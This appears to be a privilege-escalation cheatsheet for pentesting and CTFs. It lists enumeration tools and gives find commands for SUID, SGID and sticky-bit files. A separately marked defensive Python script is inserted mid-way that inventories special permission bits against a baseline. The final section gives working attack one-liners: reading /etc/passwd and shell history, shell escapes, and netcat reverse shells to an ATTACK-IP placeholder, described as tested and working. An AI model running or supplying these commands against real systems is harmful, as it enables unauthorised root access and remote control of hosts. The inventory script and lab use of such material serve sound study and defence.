PEASS - Privilege Escalation Awesome Scripts SUITE (with colors)
Privilege Escalation Enumeration Script for Windows
These tools search for possible local privilege escalation paths that you could exploit and print them to you with nice colors so you can recognize the misconfigurations easily.
Privilege Escalation Enumeration Toolkit (64/32-bit), fast, intelligent enumeration with Web API integration. Mastering Your Own Finding
Linux enumeration tool for pentesting and CTFs with verbosity levels
A GUIDE TO LINUX PRIVILEGE ESCALATION
WES-NG is a tool based on the output of Windows' systeminfo utility which provides the list of vulnerabilities the OS is vulnerable to, including any exploits for these vulnerabilities. Every Windows OS between Windows XP and Windows 10, including their Windows Server counterparts, is supported.
A tool to identify and exploit sudo rules' misconfigurations and vulnerabilities within sudo
Linux privilege escalation checks (systemd, dbus, etc)
PrivEsc exploit for Windows 7 and Windows Server 2008
Sticky bit - Only the owner of the directory or the owner of a file can delete or rename here.
find / -perm -1000 -type d 2>/dev/null
SGID (chmod 2000) - runs with the file's group, not the group of the user who started it.
find / -perm -g=s -type f 2>/dev/null
SUID (chmod 4000) - runs as the file's owner, not the user who started it.
find / -perm -u=s -type f 2>/dev/null
SGID or SUID
find / -perm -g=s -o -perm -u=s -type f 2>/dev/null
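The three find commands above answer one question each; a defender usually wants the same information as an inventory that can be diffed against a known-good baseline, so that a newly appeared SUID/SGID binary or sticky directory stands out. The following script is an added example, not part of this cheatsheet or of any of the tools it lists: it walks a tree with os.walk, mirrors the -perm checks using the stat module, and reports only entries whose special bits are absent from a baseline. build_sample_tree() is a constructed fixture (temporary files with the bits set), not a real system; scan_special_bits() and new_since_baseline() are hypothetical helper names.

```python
import os
import stat
import tempfile


def build_sample_tree() -> str:
    """Constructed sample tree (assumption: not a real system). Creates one
    file per special-bit combination plus a sticky directory so the scanner
    can be exercised offline. Setting these bits on files you own needs no
    privilege; whether the kernel honours them on a nosuid mount is irrelevant
    for the inventory."""
    root = tempfile.mkdtemp(prefix="privbits-")
    modes = {
        "suid_bin": 0o4755,       # setuid only  (find -perm -u=s)
        "sgid_bin": 0o2755,       # setgid only  (find -perm -g=s)
        "suid_sgid_bin": 0o6755,  # both bits    (find -perm -g=s -o -perm -u=s)
        "plain_bin": 0o755,       # control: no special bit, must not be reported
    }
    for name, mode in modes.items():
        path = os.path.join(root, name)
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\n")  # content is irrelevant, only the mode matters
        os.chmod(path, mode)
    sticky_dir = os.path.join(root, "shared_tmp")
    os.mkdir(sticky_dir)
    os.chmod(sticky_dir, 0o1777)  # sticky dir  (find -perm -1000 -type d)
    return root


def scan_special_bits(root: str) -> dict:
    """Return {relative_path: set_of_bits} for every regular file carrying
    setuid/setgid and every directory carrying the sticky bit under root.
    Uses lstat so symlinks are never followed into other trees."""
    results = {}
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames:
            full = os.path.join(dirpath, name)
            st = os.lstat(full)
            if stat.S_ISDIR(st.st_mode) and st.st_mode & stat.S_ISVTX:
                results[os.path.relpath(full, root)] = {"sticky"}
        for name in filenames:
            full = os.path.join(dirpath, name)
            st = os.lstat(full)
            if not stat.S_ISREG(st.st_mode):
                continue  # skip symlinks, sockets, fifos: find -type f does too
            bits = set()
            if st.st_mode & stat.S_ISUID:
                bits.add("suid")
            if st.st_mode & stat.S_ISGID:
                bits.add("sgid")
            if bits:
                results[os.path.relpath(full, root)] = bits
    return results


def new_since_baseline(current: dict, baseline: dict) -> dict:
    """Entries that are new or gained a special bit since the baseline scan.
    Entries that merely lost a bit are not alarming and are not reported."""
    return {path: bits - baseline.get(path, set())
            for path, bits in current.items()
            if bits - baseline.get(path, set())}


if __name__ == "__main__":
    root = build_sample_tree()
    first = scan_special_bits(root)                 # pretend this was the baseline
    os.chmod(os.path.join(root, "plain_bin"), 0o4755)  # simulate a later change
    for path, bits in sorted(new_since_baseline(scan_special_bits(root), first).items()):
        print(f"NEW special bits {sorted(bits)} on {path}")
```

On a real host you would run scan_special_bits("/") once after provisioning, store the result, and re-run it on a schedule: the output of new_since_baseline() is the short list worth a human's attention, whereas the raw find output on a stock distribution runs to dozens of legitimate entries.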
Basic Linux Privilege Escalation
uname -a
sudo -l
su -s
cat /etc/passwd
cat ~/.bash_history
Automated:
https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
http://www.securitysift.com/download/linuxprivchecker.py
http://pentestmonkey.net/tools/unix-privesc-check/unix-privesc-check-1.4.tar.gz
python -c 'import pty; pty.spawn("/bin/sh")'
python3 -c "__import__('pty').spawn('/bin/bash')"
echo os.system('/bin/bash')
/bin/sh -i
perl -e 'exec "/bin/sh";'
perl: exec "/bin/sh";
ruby: exec "/bin/sh"
lua: os.execute('/bin/sh')
nmap : !sh
vi : :set shell=/bin/bash:shell
vi : :!bash
Attacker: nc -nvlp 6666
Victim: nc ATTACK-IP 6666 -e /bin/bash
OR
mknod /tmp/backpipe p; /bin/sh 0</tmp/backpipe | nc ATTACK-IP 6666 1>/tmp/backpipe
Tested in a CTF ==> works perfectly!